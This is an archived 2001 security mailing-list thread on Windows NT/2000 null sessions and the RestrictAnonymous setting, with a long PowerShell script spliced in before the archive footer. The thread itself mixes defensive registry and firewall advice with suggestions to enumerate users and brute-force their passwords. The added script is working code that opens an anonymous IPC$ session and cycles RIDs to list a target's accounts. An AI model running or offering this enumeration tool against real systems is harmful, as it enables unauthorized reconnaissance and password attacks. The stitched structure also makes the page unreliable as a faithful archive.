The key is HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA, and the value name is RestrictAnonymous. In NT 4.0, RestrictAnonymous only supports a value data of 0 or 1. Win2k supports 0, 1 and a new value data of 2: no access without explicit permissions, meaning that RA=2 will even keep you from doing a [net use \\box\ipc$ "" /user:""].

And you are correct: setting RA=1 does break some functionality, and RA=2 breaks even more. However, the entire implementation of RA is funky; it doesn't really keep me from enumerating users via a null session. Though it will make DumpSec fail, along with other progs that use most of the Net* API calls, it does not put ACLs on LookupAccountName or LookupAccountSID (that is why user2sid/sid2user still work with RA=1). Additionally, one can make calls to NetUserGetInfo as a null user to return all account information on both NT and Win2k (even extended schema info on 2k). I combined these calls together in UserDump to allow you to effectively dump the entire user base with a single command line as the null user, even with RA=1 set. (Feel free to check it out at http://www.hammerofgod.com/download.htm)

So, setting RA=1 doesn't really do much for you, and setting RA=2 normally breaks so much necessary functionality that it is not used, meaning that we can always dump all of your users if we want to. Though the MS security team has been after Dev to change this for a while, it still remains an issue. Word on the street is that they finally got through to them, and that they are going to fix these 'holes' in RA=1... That is really what is necessary, and I will be happy when I see it.

Until then, keep your net-facing boxes blocking UDP 137, 138, and 445 and TCP 139 and 445.

---------------------------------
Attonbitus Deus
Thorat_private

----- Original Message -----
From: "Keith.Morgan" <Keith.Morganat_private>
To: <VULN-DEVat_private>
Sent: Sunday, April 15, 2001 11:30 AM
Subject: Re: Security Issues ... NT vuln ?
> Beware using that key (it restricts null user sessions) in an environment
> where NT trust relationships are in place. Turning null sessions off
> removes a trusting domain's ability to enumerate users in the trusted
> domain. This causes authentication to fail.
>
> If you have no trust relationships, I highly recommend using the key to
> restrict null sessions.
>
> Keith T. Morgan
> Chief of Information Security
> Terradon Communications
> keith.morganat_private
> 304-755-8291 x142
>
> > -----Original Message-----
> > From: FatFinger [SMTP:fatfingerat_private]
> > Sent: Friday, April 13, 2001 1:10 PM
> > To: VULN-DEVat_private
> > Subject: Re: Security Issues ... NT vuln ?
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> >
> > Sekure,
> >
> > Talking about Null Session Attacks, it's not so simple as you pointed
> > out in your e-mail, but it's also not as big a deal as some people say.
> >
> > In fact, when you find a PDC or a BDC server (talking about *yuck*
> > Windows NT), you can create a null session using standard 'net use'
> > commands from a DOS prompt. If you're successful, you'll open an IPC$
> > connection. With it, you can use some tools like DumpACL (now
> > DumpSec) to get a list of users, even from the Admin group. If I'm not
> > wrong, you can find this tool at http://www.systemtools.com
> >
> > Now that you know the users of that system, you can place several
> > different 'net uses' using these usernames with different passwords,
> > which you can try to get using brute force attacks, dictionary
> > attacks, etc. Note that most passwords are weak and easy to crack
> > (and no password is uncrackable).
> >
> > Null Session, in my point of view, can open a system to a
> > confidentiality attack. It's used more to 'probe' for info. If you
> > want to avoid this thing on your servers, there's a reg key you can
> > change. Check the www.microsoft.com web site (security bulletin) to
> > get more info about it.
> > Just remember that some tools need to create
> > null sessions and changing this reg key can lead you to an
> > availability problem.
> >
> > Any comments, folks?
> >
> > All the best!
> >
> > FatFinger
> >
> >
> > - ----- Original Message -----
> > From: "sekure" <sekureat_private>
> > To: <VULN-DEVat_private>
> > Sent: Tuesday, April 10, 2001 8:53 AM
> > Subject: Security Issues ... NT vuln ?
> >
> >
> > > Hi Guys,
> > >
> > > First, sorry for my poor English.
> > >
> > > I'm sending this mail... because I have several questions about security. :-)
> > >
> > >
> > > 1) I saw in my machine that we have a "control of IIS" named
> > > Console Root, but when I call it (local machine) it opens me a graphical
> > > screen to config. But its name is CONSOLE root; can I use it in text
> > > mode?? How?? If it is possible, can I use it remotely? Do you know if all
> > > machines have this file/application?? The name that I use to execute it
> > > is: iis.msc :-)
> > >
> > > 2) I have done tests with netmasks... We know that I can't see computers
> > > with other netmasks... example machine A = 200.210.55.240/255.255.255.248
> > > can't see B = 200.210.55.241/255.255.255.216... correct?? Do you know
> > > some way of seeing these other machines without changing your netmask??
> > > A scanner that simulates another netmask, I don't know!! :-)
> > > If you know... please... tell me!
> > >
> > > 3) I installed NT 4.0 and put on SP6.0... and installed IIS... it put
> > > IIS 3.0! :) How to upgrade it to 4.0?? Only with Option Pack 4.0?? Is it
> > > possible to upgrade to IIS 5.0?? How to?? Where can I get these upgrades,
> > > or IISes?
> > >
> > > 4) I already saw in several TXTs about security in NT... saying that it is
> > > very dangerous to have NETBIOS/SAMBA. We can connect with a null
> > > session. OK, suppose that I have done it!
> > > In my network: "net use \\192.168.0.100\ipc$ "" /user:""" works very
> > > well!
> > > But then?? What can I do with it?? With it I try to access
> > > other shares like admin$ and I don't have access. I try to access the
> > > registry... and I don't have access again. Why can it be very dangerous??
> > > I can't understand; suppose that a bit-lamma user has user: "joao"
> > > and passwd: "joao" and it is a normal user (not a member of the admin
> > > group). What can I do with it?? Can't access the registry, other
> > > shares, c$, d$, e$, ...!! For me it is equivalent to a null session. I cannot
> > > do anything!! If you know a good "trick" that I can do with it,
> > > please tell me! :-)
> > >
> > > 5) I installed Option Pack 4.0 on my NT+IIS4 to test! :-)
> > > It is good, but when I try the test(s) of NT-box... in IIS... it
> > > didn't allow...!! :-) I tried to execute... nt-box... and execute
> > > mkilog, dnsform, cts.idc, *.htx, ... All these files EXIST on my server!! :-)
> > > But when I try to access (execute) one of these files it is not
> > > executed; it returns me: "A screen to download the file". I can save the
> > > file... or execute it... if I execute it, it opens a cmd screen, executes it
> > > and closes the window! What is it?? A protection of Option Pack 4.0??
> > > Permissions of NTFS?? Permissions of users in IIS?? How can I change it?
> > > How can I crack it??
> > >
> > > 6) Does somebody know a program for the command line (cmd.exe or command.com)
> > > that can manipulate the registry?? To see keys, write to keys, ...! Do
> > > you know?? Where can I get it??
> > >
> > > 7) Does the "NT hash" stay in the registry?? Who can read it?? Where
> > > is it?? I looked in my NT with regedit and regedt32... but I can't
> > > find it... I saw the key HKEY_LOCAL_MACHINE\SAM\SAM <- but this key appears
> > > blank, and its color is different from the other colors... its color is
> > > gray!! I'm looking as administrator.
> > > Does data exist in \HKEY_LOCAL_MACHINE\SAM\SAM? Why can't I
> > > see it?? How do I see it??
> > >
> > > 8) I'm thinking...! :-)
> > > Suppose that I can spoof the network... then I can see the hashes of
> > > authentication!! Can I get this authentication and re-send it to the
> > > server? Will it accept it only as one more package?? Or will it accept
> > > it as an authorization?? If it works, I can change my privileges from
> > > normal user to administrator! :-) And better... I don't need to lose much
> > > time trying to crack the password from the hash! :-)
> > >
> > > 9) The administrator that puts NTFS security permissions on CMD.EXE and
> > > Command.com and the inetpub folder (with good permission only to
> > > administrator) without access to IUSR_MACHINE and EVERYONE. Can we say
> > > that his IIS is 100% secure or 99.99999999999%?? What can be done
> > > against it??
> > >
> > >
> > > Thkz for all attention and help in advance.
> > >
> > > Excuse me for the accumulation of question(s)... =)
> > >
> > > Best Regards.
> > >
> > > [ ]'s
> > >
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
> >
> > iQEVAwUBOtcy+O8uJYTAsvxwAQG9jAf/Rf/4lLMFl9AFs/lZqwiPWqnXr11a8OhR
> > y7oTXN1wGMfdJJ9zbTDdR4tCSqY7YOlwj24glPwCa2wFD7B51LfNWBOCQhVvuyzQ
> > sGD/oZUoQ2MsAsZkuYZI2amZl3G1R6QwjR3mUbUVvxsuoikBmkPH+8MRNMHZTAsV
> > PvcfBJAKME5UNZorihSpVdUV+VZzZluu0rzn1NeuwyeCcPWJCkt6SXC4ggOwryE2
> > ttAHvG1sdKmC48Lz4vD4+wo6J36qX5sCVVk4zrWpAiBcVW6kcTZVd1JPo12d3y68
> > Jg5WGsUQme94V0hA0lVBgav5ZbSCRAvhpBZ6mJ8Rui1IbGY3/LxZbQ==
> > =Hau+
> > -----END PGP SIGNATURE-----
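The point made at the top of this thread (RA=1 stops the Net* enumeration that DumpSec relies on but leaves LookupAccountName/LookupAccountSid unprotected, so the user2sid/sid2user trick still works over a null session) can be checked directly. The following is an added example, written for this page; it is not code from the thread and not UserDump, user2sid or sid2user. It reads the local RestrictAnonymous value and states what each level buys you, then opens the null session from the thread and cycles RIDs through LookupAccountSid against the target. The target name 'box', the use of 'Guest' (RID 501, assumed not renamed) to learn the domain SID, and the RID range 500..1050 are all assumptions.

```powershell
# Added example, not from the original post: RestrictAnonymous check plus a
# null-session SID-cycling probe using the same LSA calls the post names.
# Assumptions: target 'box', 'Guest' still has its default name, RIDs 500..1050.

Add-Type -Namespace Win32 -Name Lsa -MemberDefinition @'
[DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool LookupAccountName(string lpSystemName, string lpAccountName,
    byte[] Sid, ref uint cbSid, System.Text.StringBuilder ReferencedDomainName,
    ref uint cchReferencedDomainName, out int peUse);

[DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool LookupAccountSid(string lpSystemName, byte[] Sid,
    System.Text.StringBuilder Name, ref uint cchName, System.Text.StringBuilder ReferencedDomainName,
    ref uint cchReferencedDomainName, out int peUse);
'@

function Get-RestrictAnonymousLevel {
    # Local check only: the key is not readable over a null session.
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $ra  = (Get-ItemProperty -Path $key -Name RestrictAnonymous -ErrorAction SilentlyContinue).RestrictAnonymous
    if ($null -eq $ra) { $ra = 0 }      # value absent behaves like 0
    $meaning = switch ($ra) {
        0 { 'null sessions unrestricted' }
        1 { 'Net* enumeration (DumpSec) blocked; LookupAccountName/LookupAccountSid and NetUserGetInfo still answer' }
        2 { 'no access without explicit permissions (Win2k); even net use \\box\ipc$ "" /user:"" is refused' }
        default { "unexpected value $ra" }
    }
    [pscustomobject]@{ RestrictAnonymous = $ra; Meaning = $meaning }
}

function Connect-NullSession {
    param([Parameter(Mandatory)][string]$Target)
    # Empty user, empty password against IPC$. PowerShell drops empty-string
    # arguments to native commands, so the "" are passed as literal quotes.
    net use ('\\' + $Target + '\ipc$') '""' '/user:""' 2>$null | Out-Null
    return ($LASTEXITCODE -eq 0)
}

function Get-DomainSid {
    param([Parameter(Mandatory)][string]$Target, [string]$KnownAccount = 'Guest')
    # user2sid: resolve one known name to its SID, then drop the RID to get the domain SID.
    $sid = New-Object byte[] 68; $cb = [uint32]68
    $dom = New-Object System.Text.StringBuilder 256; $cch = [uint32]256; $use = 0
    $ok  = [Win32.Lsa]::LookupAccountName($Target, $KnownAccount, $sid, [ref]$cb, $dom, [ref]$cch, [ref]$use)
    if (-not $ok) {
        $err = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
        throw "LookupAccountName($KnownAccount) on $Target failed, Win32 error $err (RA=2, or anonymous translation disabled?)"
    }
    $full = New-Object System.Security.Principal.SecurityIdentifier -ArgumentList $sid, 0
    return $full.AccountDomainSid      # S-1-5-21-x-y-z without the trailing RID
}

function Invoke-SidCycle {
    param([Parameter(Mandatory)][string]$Target,
          [Parameter(Mandatory)][System.Security.Principal.SecurityIdentifier]$DomainSid,
          [int]$FirstRid = 500, [int]$LastRid = 1050)
    # sid2user: ask the target to name each domain SID + RID; every hit is a real account or group.
    foreach ($rid in $FirstRid..$LastRid) {
        $sid = New-Object System.Security.Principal.SecurityIdentifier -ArgumentList "$DomainSid-$rid"
        $bin = New-Object byte[] ($sid.BinaryLength)
        $sid.GetBinaryForm($bin, 0)
        $name = New-Object System.Text.StringBuilder 256; $cchN = [uint32]256
        $dom  = New-Object System.Text.StringBuilder 256; $cchD = [uint32]256; $use = 0
        if ([Win32.Lsa]::LookupAccountSid($Target, $bin, $name, [ref]$cchN, $dom, [ref]$cchD, [ref]$use)) {
            # SID_NAME_USE: 1 = user, 2 = group, 4 = alias (local group)
            [pscustomobject]@{ Rid = $rid; Account = "$dom\$name"; SidType = $use }
        }
    }
}

Get-RestrictAnonymousLevel | Format-List

$target = 'box'                      # assumption: the host from the net use example above
if (Connect-NullSession -Target $target) {
    try {
        $domainSid = Get-DomainSid -Target $target
        "Domain SID of ${target}: $domainSid"
        Invoke-SidCycle -Target $target -DomainSid $domainSid | Format-Table -AutoSize
    } finally {
        net use ('\\' + $target + '\ipc$') /delete 2>$null | Out-Null
    }
} else {
    "Null session to $target refused (RA=2 on Win2k, or null sessions otherwise disabled)."
}
```

Run it from a workstation that can reach TCP 139/445 on the target. With RA=0 or RA=1 on an NT 4.0 or Win2k box the RID walk returns the account list; with RA=2 the `net use` itself fails and the script stops at the first branch. On current Windows releases anonymous SID/name translation is disabled by default, so there Get-DomainSid throws even though the null session may be accepted; that throw is the expected result, not a bug in the probe.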
This archive was generated by hypermail 2b30 : Mon Apr 16 2001 - 08:23:52 PDT